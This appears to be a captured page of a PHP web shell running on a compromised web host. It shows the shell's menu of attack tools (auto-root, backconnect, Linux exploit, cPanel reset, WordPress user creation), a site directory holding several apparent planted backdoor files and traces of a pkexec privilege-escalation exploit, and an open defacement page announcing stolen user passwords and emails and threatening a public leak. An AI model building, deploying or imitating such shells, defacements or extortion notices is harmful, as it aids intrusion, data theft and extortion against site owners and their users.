Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
dr-xr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
app
[ DIR ]
dr-xr-xr-x
bootstrap
[ DIR ]
dr-xr-xr-x
cgi-bin
[ DIR ]
dr-xr-xr-x
config
[ DIR ]
dr-xr-xr-x
database
[ DIR ]
dr-xr-xr-x
lang
[ DIR ]
dr-xr-xr-x
loosgin
[ DIR ]
dr-xr-xr-x
node_modules
[ DIR ]
dr-xr-xr-x
ola
[ DIR ]
dr-xr-xr-x
public
[ DIR ]
dr-xr-xr-x
resources
[ DIR ]
dr-xr-xr-x
rout
[ DIR ]
dr-xr-xr-x
routes
[ DIR ]
dr-xr-xr-x
storage
[ DIR ]
dr-xr-xr-x
tests
[ DIR ]
dr-xr-xr-x
vendor
[ DIR ]
dr-xr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
dr-xr-xr-x
wp-includes
[ DIR ]
dr-xr-xr-x
.hta
6.57
KB
-rw-r--r--
.htaccess
233
B
-rw-r--r--
.litespeed_flag
297
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
b.html
586
B
-rw-r--r--
error_log
5.94
MB
-rw-r--r--
ghost.html
5.28
KB
-rw-r--r--
hxvn.php
381
B
-rw-r--r--
index.html
6.57
KB
-rw-r--r--
index.php
6.57
KB
-r--r--r--
karma_syndicate_6iwzu5yjhs.php
27.51
KB
-rw-r--r--
karma_syndicate_8b70tw2qzj.php
27.51
KB
-rw-r--r--
karma_syndicate_txfwv9q4cy.php
27.51
KB
-rw-r--r--
robots.txt
66
B
-rw-r--r--
t6wer-send.php
453
B
-rw-r--r--
wp-blog-header.php
541
B
-rw-r--r--
wp-load.php
3.95
KB
-rw-r--r--
wp-loada.php
2.32
KB
-rw-r--r--
wp-loadb.php
2.14
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ghost.html
<!DOCTYPE html> <html lang="bn"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>HACKED BY TH3 EL1T3 GH0ST</title> <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css2?family=Iceland&display=swap" rel="stylesheet"> <style> * { margin: 0; padding: 0; box-sizing: border-box; } html, body { width: 100%; height: 100%; font-family: Arial, sans-serif; background-color: black; } body { background-image: url('https://media.giphy.com/media/4XZXEgf4QP0fWLkRsG/giphy.gif'); background-size: cover; background-position: center; background-repeat: no-repeat; background-attachment: fixed; } .main-content { display: flex; flex-direction: column; align-items: center; justify-content: flex-start; min-height: 100vh; text-align: center; padding: 50px 20px; } h1 { font-size: 2em; color: #00ff00; } h2 { font-family: 'Iceland', sans-serif; font-size: 3.2em; color: red; animation: glitch 0.5s linear infinite; } @keyframes glitch { 0% { text-shadow: 2px 2px 5px red; } 50% { text-shadow: -2px -2px 5px blue; } 100% { text-shadow: 2px -2px 5px green; } } h3 { font-size: 1.8em; color: white; margin-top: 20px; } p { font-family: 'Iceland', sans-serif; font-size: 1.4em; color: #00ffff; background: rgba(0, 0, 0, 0.6); padding: 15px 25px; margin: 15px auto; width: 90%; max-width: 800px; border: 2px solid #00ff00; border-radius: 10px; text-shadow: 0 0 5px #0ff; box-shadow: 0 0 10px #0ff, 0 0 20px #0ff inset; animation: flicker 1.5s infinite alternate; } @keyframes flicker { 0% { opacity: 1; } 50% { opacity: 0.7; text-shadow: 0 0 3px #0ff; } 100% { opacity: 1; } } .marquee { width: 100%; overflow: hidden; position: relative; height: 40px; margin-top: 40px; background: rgba(0, 0, 0, 0.6); border-top: 2px solid red; border-bottom: 2px solid red; } .marquee span { display: inline-block; white-space: nowrap; padding-left: 100%; font-size: 1.5em; font-family: 'Iceland', sans-serif; color: red; text-shadow: 0 0 5px red; animation: marquee-animation 15s linear infinite; } @keyframes marquee-animation { 0% { transform: translateX(0); } 100% { transform: translateX(-100%); } } .telegram-container { margin-top: 30px; } .telegram-container a { display: inline-flex; align-items: center; text-decoration: none; background-color: #0088cc; color: #fff; padding: 10px 20px; border-radius: 25px; font-size: 16px; font-weight: bold; box-shadow: 0 5px 10px rgba(0, 0, 0, 0.5); transition: background-color 0.3s, box-shadow 0.3s; } .telegram-container a:hover { background-color: #005f99; box-shadow: 0 8px 15px rgba(0, 0, 0, 0.7); } .telegram-container img { margin-right: 10px; height: 24px; width: 24px; } audio { margin-top: 30px; filter: drop-shadow(0 0 10px #00ffff); } </style> </head> <body> <div class="main-content"> <img src="https://envs.sh/Qol.jpg" alt="Logo" width="250"> <h1>Hacked by</h1> <h2>TH3 EL1T3 GH0ST</h2> <h3>- NOTICE -</h3> <p> WARNING! YOUR DATA HAS BEEN COMPROMISED!<br> WE HAVE STOLEN ALL YOUR USERS' DATA, INCLUDING PASSWORDS AND EMAILS. </p> <p>IF YOU DO NOT RESPOND, WE WILL LEAK EVERYTHING PUBLICLY.</p> <div class="marquee"> <span>THIS WEBSITE HACKED BY TH3 EL1T3 GH0ST ✯ THIS WEBSITE HACKED BY TH3 EL1T3 GH0ST ✯</span> </div> <audio id="bgAudio" loop autoplay controls> <source src="https://envs.sh/Q-6.mp4" type="audio/mpeg"> Your browser does not support the audio element. </audio> <div class="telegram-container"> <a href="https://t.me/TH3EL1T3GH0STOFFICIAL" target="_blank"> <img src="https://upload.wikimedia.org/wikipedia/commons/8/82/Telegram_logo.svg" alt="Telegram Logo"> Join Our Telegram Channel </a> </div> </div> </body> </html>
Close